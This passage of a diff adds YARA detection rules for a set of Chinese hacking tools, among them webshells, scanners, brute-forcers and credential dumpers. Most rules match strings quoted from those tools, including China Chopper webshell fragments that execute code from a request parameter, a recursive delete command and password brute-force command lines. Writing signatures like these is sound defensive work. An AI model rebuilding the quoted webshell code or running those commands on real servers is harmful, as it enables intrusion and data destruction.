+      $s1 = "$sURL = \"http://\".$sServer.\"/\".$sFile;" fullword ascii
+      $s2 = "chmod(\"/\".substr($sHash, 0, 2), 0777);" fullword ascii
+      $s3 = "$sCmd = \"echo 123> \".$sFileOut;" fullword ascii
+   condition: 
+      filesize < 6KB and all of them
+}
+
+rule Webshell_item_301_RID2D48 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file item-301.php"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:25:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$sURL = \"301:http://\".$sServer.\"/index.asp\";" fullword ascii
+      $s2 = "(gov)\\\\.(cn)$/i\", $aURL[\"host\"])" ascii
+      $s3 = "$aArg = explode(\" \", $sContent, 5);" fullword ascii
+      $s4 = "$sURL = $aArg[0];" fullword ascii
+   condition: 
+      filesize < 3KB and 3 of them
+}
+
+rule Webshell_CN_Tools_item_RID2FB5 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file item.php"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 12:08:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$sURL = \"http://\".$sServer.\"/\".$sWget;" fullword ascii
+      $s2 = "$sURL = \"301:http://\".$sServer.\"/\".$sWget;" fullword ascii
+      $s3 = "$sWget=\"index.asp\";" fullword ascii
+      $s4 = "$aURL += array(\"scheme\" => \"\", \"host\" => \"\", \"path\" => \"\");" fullword ascii
+   condition: 
+      filesize < 4KB and all of them
+}
+
+rule Webshell_f3_diy_RID2CE4 : CHINA DEMO FILE HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file diy.asp"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:08:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%@LANGUAGE=\"VBScript.Encode\" CODEPAGE=\"936\"%>" fullword ascii
+      $s5 = ".black {" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 10KB and all of them
+}
+
+rule Dos_Down32_RID2A93 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file Down32.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 06:56:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
+      $s6 = "down.exe" fullword wide
+      $s15 = "get_Form1" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 137KB and all of them
+}
+
+rule dat_report_RID2B45 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file report.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:59:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<a href=\"http://www.xfocus.net\">X-Scan</a>" fullword ascii
+      $s2 = "REPORT-ANALYSIS-OF-HOST" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 480KB and all of them
+}
+
+rule SwitchSniffer_RID2C50 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file SwitchSniffer_RID2C50.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:43:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "NextSecurity.NET" fullword wide
+      $s2 = "SwitchSniffer_RID2C50 Setup" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and all of them
+}
+
+rule Webshell_ChinaChopper_temp_RID316F : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file temp.asp"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 13:22:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "o.run \"ff\",Server,Response,Request,Application,Session,Error" fullword ascii
+      $s1 = "Set o = Server.CreateObject(\"ScriptControl\")" fullword ascii
+      $s2 = "o.language = \"vbscript\"" fullword ascii
+      $s3 = "o.addcode(Request(\"SC\"))" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule Webshell_Tools_2015_RID2DDE : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file 2015.jsp"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:50:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Configbis = new BufferedInputStream(httpUrl.getInputStream());" fullword ascii
+      $s4 = "System.out.println(Oute.toString());" fullword ascii
+      $s5 = "String ConfigFile = Outpath + \"/\" + request.getParameter(\"ConFile\");" fullword ascii
+      $s8 = "HttpURLConnection httpUrl = null;" fullword ascii
+      $s19 = "Configbos = new BufferedOutputStream(new FileOutputStream(Outf));;" fullword ascii
+   condition: 
+      filesize < 7KB and all of them
+}
+
+rule Webshell_reDuhServers_reDuh_3_RID3271 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file reDuh.aspx"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 14:05:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Response.Write(\"[Error]Unable to connect to reDuh.jsp main process on port \" +" ascii
+      $s2 = "host = System.Net.Dns.Resolve(\"127.0.0.1\");" fullword ascii
+      $s3 = "rw.WriteLine(\"[newData]\" + targetHost + \":\" + targetPort + \":\" + socketNum" ascii
+      $s4 = "Response.Write(\"Error: Bad port or host or socketnumber for creating new socket" ascii
+   condition: 
+      filesize < 40KB and all of them
+}
+
+rule Webshell_ChinaChopper_temp_3_RID3201 : CHINA DEMO FILE HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file temp.aspx"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 13:46:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"" ascii
+      $s1 = "\"],\"unsafe\");%>" ascii
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 150 and all of them
+}
+
+rule hscan_gui_RID2AC2 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file hscan-gui.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:15:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Hscan.EXE" fullword wide
+      $s1 = "RestTool.EXE" fullword ascii
+      $s3 = "Hscan Application " fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 550KB and all of them
+}
+
+rule Arp_EMP_v1_0_RID2B0A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file Arp EMP v1.0.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:49:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Arp EMP v1.0.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and all of them
+}
+
+rule HTTPSCANNER_RID2A5B : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file HTTPSCANNER_RID2A5B.EXE"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 05:23:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "HttpScanner.exe" fullword wide
+      $s2 = "HttpScanner" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3500KB and all of them
+}
+
+rule PLUGIN_AJunk_RID2B18 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file AJunk.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:51:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "AJunk.dll" fullword ascii
+      $s2 = "AJunk.DLL" fullword wide
+      $s3 = "AJunk Dynamic Link Library" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 560KB and all of them
+}
+
+rule Tools_scan_RID2B26 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file scan.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:54:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "Shanlu Studio" fullword wide
+      $s3 = "_AutoAttackMain" fullword ascii
+      $s4 = "_frmIpToAddr" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+}
+
+rule IISPutScannesr_RID2C6C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file IISPutScannesr_RID2C6C.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:48:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "yoda & M.o.D." ascii
+      $s2 = "-> come.to/f2f **************" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and all of them
+}
+
+rule CN_Tools_xbat_RID2C20 : APT CHINA DEMO FILE HKTL SCRIPT {
+   meta:
+      description = "Chinese Hacktool Set - file xbat.vbs"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:35:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, FILE, HKTL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "ws.run \"srss.bat /start\",0 " fullword ascii
+      $s1 = "Set ws = Wscript.CreateObject(\"Wscript.Shell\")" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x6553 and filesize < 0KB and all of them
+}
+
+rule CN_Tools_Temp_RID2C07 : APT CHINA DEMO FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file Temp.war"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:31:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "META-INF/context.xml<?xml version=\"1.0\" encoding=\"UTF-8\"?>" fullword ascii
+      $s1 = "browser.jsp" fullword ascii
+      $s3 = "cmd.jsp" fullword ascii
+      $s4 = "index.jsp" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and filesize < 203KB and all of them
+}
+
+rule sbin_squid_RID2B42 : APT CHINA DEMO HKTL SCRIPT T1007 {
+   meta:
+      description = "Chinese Hacktool Set - file squid.bat"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:58:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, HKTL, SCRIPT, T1007"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "del /s /f /q" fullword ascii
+      $s1 = "squid.exe -z" fullword ascii
+      $s2 = "net start Squid" fullword ascii
+      $s3 = "net stop Squid" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule sql1433_creck_RID2B93 : APT CHINA DEMO FILE HKTL SCRIPT {
+   meta:
+      description = "Chinese Hacktool Set - file creck.bat"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:12:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, FILE, HKTL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "start anhao3.exe -i S.txt -p  pass3.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
+      $s1 = "start anhao1.exe -i S.txt -p  pass1.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
+      $s2 = "start anhao2.exe -i S.txt -p  pass2.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x7473 and filesize < 1KB and 1 of them
+}
+
+rule sql1433_Start_RID2B99 : APT CHINA DEMO HKTL SCRIPT {
+   meta:
+      description = "Chinese Hacktool Set - file Start.bat"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:13:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, HKTL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+      $s2 = "start creck.bat" fullword ascii
+      $s3 = "del s1.txt" fullword ascii
+      $s4 = "del Result.txt" fullword ascii
+      $s5 = "del s.TXT" fullword ascii
+      $s6 = "mode con cols=48 lines=20" fullword ascii
+   condition: 
+      filesize < 1KB and 2 of them
+}
+
+rule mswin_check_lm_group_RID2F60 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file mswin_check_lm_group_RID2F60.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 11:54:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-03-15"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Valid_Global_Groups: checking group membership of '%s\\%s'." fullword ascii
+      $s2 = "Usage: %s [-D domain][-G][-P][-c][-d][-h]" fullword ascii
+      $s3 = "-D    default user Domain" fullword ascii
+      $fp1 = "Panda Security S.L." ascii wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 380KB and all of ( $s* ) and not 1 of ( $fp* )
+}
+
+rule WAF_Bypass_RID2AC0 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file WAF-Bypass.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:11:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Email: blacksplitn@gmail.com" fullword wide
+      $s2 = "User-Agent:" fullword wide
+      $s3 = "Send Failed.in RemoteThread" fullword ascii
+      $s4 = "www.example.com" fullword wide
+      $s5 = "Get Domain:%s IP Failed." fullword ascii
+      $s6 = "Connect To Server Failed." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 7992KB and 5 of them
+}
+
+rule MarathonTool_RID2BE9 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file MarathonTool_RID2BE9.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:26:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "MarathonTool_RID2BE9" ascii
+      $s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
+      $s18 = "SELECT UNICODE(SUBSTRING((system_user),{0},1))" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1040KB and all of them
+}
+
+rule PLUGIN_TracKid_RID2BE1 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file TracKid.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:25:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "E-mail: cracker_prince@163.com" fullword ascii
+      $s1 = ".\\TracKid Log\\%s.txt" fullword ascii
+      $s2 = "Coded by prince" fullword ascii
+      $s3 = "TracKid.dll" fullword ascii
+      $s4 = ".\\TracKid Log" fullword ascii
+      $s5 = "%08x -- %s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
+}
+
+rule sekurlsa_RID2A7B : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file sekurlsa_RID2A7B.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 06:16:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Bienvenue dans un processus distant" fullword wide
+      $s2 = "Format d'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur" wide
+      $s3 = "SECURITY\\Policy\\Secrets" fullword wide
+      $s4 = "Injection de donn" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1150KB and all of them
+}
+
+rule mysqlfast_RID2AF5 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file mysqlfast_RID2AF5.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:40:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "Invalid password hash: %s" fullword ascii
+      $s3 = "-= MySql Hash Cracker =- " fullword ascii
+      $s4 = "Usage: %s hash" fullword ascii
+      $s5 = "Hash: %08lx%08lx" fullword ascii
+      $s6 = "Found pass: " fullword ascii
+      $s7 = "Pass not found" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 900KB and 4 of them
+}
+
+rule DTools2_02_DTools_RID2D0D : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file DTools.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:15:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "kernel32.dll" ascii
+      $s1 = "TSETPASSWORDFORM" fullword wide
+      $s2 = "TGETNTUSERNAMEFORM" fullword wide
+      $s3 = "TPORTFORM" fullword wide
+      $s4 = "ShellFold" fullword ascii
+      $s5 = "DefaultPHotLigh" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule dll_PacketX_RID2B5C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file PacketX.dll - ActiveX wrapper for WinPcap packet capture library"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:03:11"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "[Failed to load winpcap packet.dll." wide
+      $s10 = "PacketX Version" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1920KB and all of them
+}
+
+rule SqlDbx_zhs_RID2B13 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file SqlDbx_zhs_RID2B13.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:51:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "S.failed_logins \"Failed Login Attempts\", " fullword ascii
+      $s7 = "SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLE" fullword ascii
+      $s8 = "SELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'" ascii
+      $s9 = "bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:" ascii
+      $s11 = "L.login_policy_name AS \"Login Policy\", " fullword ascii
+      $s12 = "mailto:support@sqldbx.com" fullword ascii
+      $s15 = "S.last_login_time \"Last Login\", " fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and 4 of them
+}
+
+rule DUBrute_DUBrute_RID2CA6 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file DUBrute.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:58:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
+      $s2 = "IP - 0; Login - 0; Password - 0; Combination - 0" fullword ascii
+      $s3 = "Create %d IP@Loginl;Password" fullword ascii
+      $s4 = "UBrute.com" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1020KB and all of them
+}
+
+rule ChineseHack_Tool_RID2D44 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file CookieTools.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:24:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=" fullword ascii
+      $s2 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
+      $s3 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
+      $s4 = "OnGetPasswordP" fullword ascii
+      $s5 = "http://www.chinesehack.org/" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and 4 of them
+}
+
+rule dat_NaslLib_RID2B4E : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file NaslLib.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:00:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "nessus_get_socket_from_connection: fd <%d> is closed" fullword ascii
+      $s2 = "[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%d" fullword ascii
+      $s3 = "A FsSniffer backdoor seems to be running on this port%s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1360KB and all of them
+}
+
+rule OtherTools_servu_RID2DB8 : CHINA DEMO FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file svu.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:43:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "MZKERNEL32.DLL" fullword ascii
+      $s1 = "UpackByDwing@" fullword ascii
+      $s2 = "GetProcAddress" fullword ascii
+      $s3 = "WriteFile" fullword ascii
+   condition: 
+      uint32 ( 0 ) == 0x454b5a4d and $s0 at 0 and filesize < 50KB and all of them
+}
+
+rule ustrrefadd_RID2B45 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file ustrrefadd_RID2B45.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:59:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "E-Mail  : admin@luocong.com" fullword ascii
+      $s1 = "Homepage: http://www.luocong.com" fullword ascii
+      $s2 = ": %d  -  " fullword ascii
+      $s3 = "ustrreffix.dll" fullword ascii
+      $s5 = "Ultra String Reference plugin v%d.%02d" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 320KB and all of them
+}
+
+rule XScanLib_RID2A05 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file XScanLib_RID2A05.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 03:00:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "XScanLib_RID2A05.dll" fullword ascii
+      $s6 = "Ports/%s/%d" fullword ascii
+      $s8 = "DEFAULT-TCP-PORT" fullword ascii
+      $s9 = "PlugCheckTcpPort" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 360KB and all of them
+}
+
+rule IDTools_For_WinXP_IdtTool_RID3088 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file IdtTool.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 12:43:51"
+      score = 70
+      customer = "demo"
